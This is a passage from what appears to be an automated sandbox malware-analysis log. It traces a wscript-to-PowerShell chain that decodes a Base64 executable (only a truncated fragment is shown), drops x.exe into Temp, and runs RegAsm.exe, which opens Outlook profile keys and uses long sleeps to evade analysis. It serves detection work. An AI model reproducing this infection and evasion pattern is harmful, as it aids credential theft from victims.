                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAL
                Source: x.exe.1.drStatic PE information: 0xA177E0B7 [Fri Nov 5 00:41:27 2055 UTC]
                Source: x.exe.1.drStatic PE information: section name: 6Fd:c#
                Source: x.exe.1.drStatic PE information: section name:
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E1B65 push eax; iretd 1_2_00007FFD9B7E1B5D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E1B22 push eax; iretd 1_2_00007FFD9B7E1B5D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E00AD pushad ; iretd 1_2_00007FFD9B7E00C1
                Source: x.exe.1.drStatic PE information: section name: 6Fd:c# entropy: 7.99799588046591
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 51D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 61D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6300000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 7300000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3056Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3143Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7593Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7680Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7876Thread sleep count: 2266 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7876Thread sleep count: 7593 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99343s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99125s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -99015s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98797s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98468s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -98250s >= -30000sJump to behavior
